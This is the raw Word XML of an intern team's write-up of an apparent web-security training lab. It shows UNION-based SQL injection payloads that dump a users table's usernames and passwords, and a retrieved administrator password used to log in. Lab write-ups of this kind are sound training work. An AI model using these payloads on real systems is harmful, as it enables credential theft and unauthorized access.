        <w:t>Payloads used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7405E" w14:textId="77777777" w:rsidR="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' UNION SELECT 'a', NULL--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → string “a” appeared on page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04823879" w14:textId="31F02083" w:rsidR="00CA2406" w:rsidRPr="00CA2406" w:rsidRDefault="00CA2406" w:rsidP="00DC10C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C3F32A" w14:textId="4ED4F96C" w:rsidR="00CA2406" w:rsidRDefault="00DC10C2" w:rsidP="00DC10C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B718CE8" wp14:editId="48422BDA">
            <wp:extent cx="5731510" cy="5217795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="315983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3034" name="Picture 3159830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217795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3400F" w14:textId="77777777" w:rsidR="00DC10C2" w:rsidRPr="004D516A" w:rsidRDefault="00DC10C2" w:rsidP="00DC10C2"/>
    <w:p w14:paraId="32FD590D" w14:textId="77777777" w:rsidR="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>' UNION SELECT 'a', 'a'--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> → two strings appeared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D427293" w14:textId="5E4025EF" w:rsidR="00CA2406" w:rsidRPr="00CA2406" w:rsidRDefault="00CA2406" w:rsidP="00DC10C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B849D05" w14:textId="264366AF" w:rsidR="00CA2406" w:rsidRDefault="00DC10C2" w:rsidP="00DC10C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C720BE" wp14:editId="2C36959A">
            <wp:extent cx="5731510" cy="5334635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="963773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3291" name="Picture 9637732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334635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3146D875" w14:textId="77777777" w:rsidR="00DC10C2" w:rsidRPr="004D516A" w:rsidRDefault="00DC10C2" w:rsidP="00DC10C2"/>
    <w:p w14:paraId="3C4E07C9" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00394313">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00394313">
        <w:t>Both columns accept string data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D8F7A" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="00000000" w:rsidP="004D516A">
      <w:r>
        <w:pict w14:anchorId="27838017">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5EC8D" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">d. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieved data from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09109DAA" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D3E53" w14:textId="46EFA1AF" w:rsidR="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>' UNION SELECT username, password FROM users</w:t>
      </w:r>
      <w:r w:rsidR="005A7CE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2C6D99" w14:textId="50A6CBB5" w:rsidR="005A7CE0" w:rsidRDefault="005A7CE0" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FD13A9" w14:textId="6E31578A" w:rsidR="005A7CE0" w:rsidRDefault="00E7460F" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75F82C43" wp14:editId="16A8A85C">
            <wp:extent cx="5731510" cy="5794375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="46615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5753" name="Picture 466157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794375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E9EFFD" w14:textId="77777777" w:rsidR="00E7460F" w:rsidRPr="004D516A" w:rsidRDefault="00E7460F" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CCDF81" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F378AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>: Displayed all usernames and passwords, including administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A71A2C" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="00000000" w:rsidP="004D516A">
      <w:r>
        <w:pict w14:anchorId="7AD5ABAC">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A400AB" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">e. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logged in as administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BA9589" w14:textId="77777777" w:rsidR="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">Navigated to </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>My account</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> link (top-right).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E736465" w14:textId="2D374FFC" w:rsidR="005A7CE0" w:rsidRDefault="005A7CE0" w:rsidP="009D2184">
      <w:r w:rsidRPr="005A7CE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshots</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4613FD11" w14:textId="7EC54CDB" w:rsidR="005A7CE0" w:rsidRPr="004D516A" w:rsidRDefault="0072512F" w:rsidP="0072512F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72225D0D" wp14:editId="5F98E59A">
            <wp:extent cx="5731510" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1855277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7163" name="Picture 18552771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02077474" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Entered:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730B24C9" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Username:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8F1807" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> y6n4y81f4v1o6lfulv59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65E0D9" w14:textId="77777777" w:rsidR="009D2184" w:rsidRDefault="004D516A" w:rsidP="009D2184">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Successfully logged in and solved the lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4623FD04" w14:textId="21C63ED9" w:rsidR="005A7CE0" w:rsidRPr="009D2184" w:rsidRDefault="005A7CE0" w:rsidP="009D2184">
      <w:r w:rsidRPr="009D2184">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63E286" w14:textId="54F4FB7F" w:rsidR="005A7CE0" w:rsidRPr="004D516A" w:rsidRDefault="009D2184" w:rsidP="009D2184">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5561189E" wp14:editId="0D5AECE9">
            <wp:extent cx="5731510" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1849219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9605" name="Picture 18492196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754F3D83" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Team Members Involved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F6510" w14:textId="77777777" w:rsidR="00332DE2" w:rsidRDefault="00332DE2" w:rsidP="00332DE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t>Sarthaka</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Subhankara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Singh, Intern Id – 438</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354D2FC" w14:textId="77777777" w:rsidR="00332DE2" w:rsidRDefault="00332DE2" w:rsidP="00332DE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0099054D">
        <w:t xml:space="preserve">Rahul </w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t>idha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t xml:space="preserve">Intern </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t>d </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t> 194</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EBB8D" w14:textId="77777777" w:rsidR="00332DE2" w:rsidRPr="004D516A" w:rsidRDefault="00332DE2" w:rsidP="00332DE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0099054D">
        <w:t>Saswata Som</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0099054D">
        <w:t>Intern Id - 364</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785E1ED3" w14:textId="77777777" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Date Completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD1818F" w14:textId="2E88112E" w:rsidR="004D516A" w:rsidRPr="004D516A" w:rsidRDefault="005A7CE0" w:rsidP="004D516A">
      <w:r>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="004D516A" w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> August 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C2208F" w14:textId="77777777" w:rsidR="007066F6" w:rsidRDefault="007066F6"/>
    <w:sectPr w:rsidR="00706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9F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B08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6034E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2A2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B55572"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1A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600E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A2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C4A24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11EC0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B4339"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B1EE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B306C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AAE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720E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="87FC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237CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="131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038311">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="114639187">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1189638320">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2063208861">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2050109898">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1516576864">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1051002696">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="804928958">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="358631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80"/>
    <w:rsid w:val="00083234"/>
    <w:rsid w:val="0016402C"/>
    <w:rsid w:val="001A38D5"/>
    <w:rsid w:val="001F5303"/>
    <w:rsid w:val="0020503B"/>
    <w:rsid w:val="002105E4"/>
    <w:rsid w:val="002C0452"/>
    <w:rsid w:val="002F3F26"/>
    <w:rsid w:val="00306458"/>
    <w:rsid w:val="003157B8"/>
    <w:rsid w:val="00332DE2"/>
    <w:rsid w:val="00394313"/>
    <w:rsid w:val="003A1F8D"/>
    <w:rsid w:val="003B7E47"/>
    <w:rsid w:val="00446A9F"/>
    <w:rsid w:val="004A4CEB"/>
    <w:rsid w:val="004D516A"/>
    <w:rsid w:val="00561584"/>
    <w:rsid w:val="005A7CE0"/>
    <w:rsid w:val="005C3973"/>
    <w:rsid w:val="006621A0"/>
    <w:rsid w:val="006939F6"/>
    <w:rsid w:val="007066F6"/>
    <w:rsid w:val="00717351"/>
    <w:rsid w:val="0072512F"/>
    <w:rsid w:val="00863D55"/>
    <w:rsid w:val="00900ED8"/>
    <w:rsid w:val="00923976"/>
    <w:rsid w:val="009633D3"/>
    <w:rsid w:val="0099054D"/>
    <w:rsid w:val="00993766"/>
    <w:rsid w:val="00997BAD"/>
    <w:rsid w:val="009D2184"/>
    <w:rsid w:val="009E4098"/>
    <w:rsid w:val="009F7280"/>
    <w:rsid w:val="00A84562"/>
    <w:rsid w:val="00B107DD"/>
    <w:rsid w:val="00CA2406"/>
    <w:rsid w:val="00CD4F62"/>
    <w:rsid w:val="00D50FC0"/>
    <w:rsid w:val="00D548F4"/>
    <w:rsid w:val="00DA0C1A"/>
    <w:rsid w:val="00DC10C2"/>
    <w:rsid w:val="00E22CCC"/>
    <w:rsid w:val="00E243AE"/>
    <w:rsid w:val="00E34248"/>
    <w:rsid w:val="00E64564"/>
    <w:rsid w:val="00E7460F"/>
    <w:rsid w:val="00E94F8E"/>
    <w:rsid w:val="00EE15BC"/>
    <w:rsid w:val="00EF58D6"/>
    <w:rsid w:val="00F24011"/>
    <w:rsid w:val="00F378AC"/>
    <w:rsid w:val="00F61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90E4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C5BDEDDB-3746-4997-8C9C-3DF494B1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DE2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="009F7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280"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009F7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280"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="009F7280"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009F7280"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="009F7280"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="009F7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280"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="009F7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21</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sarthaka singh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sarthaka singh</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-26T19:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-27T11:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>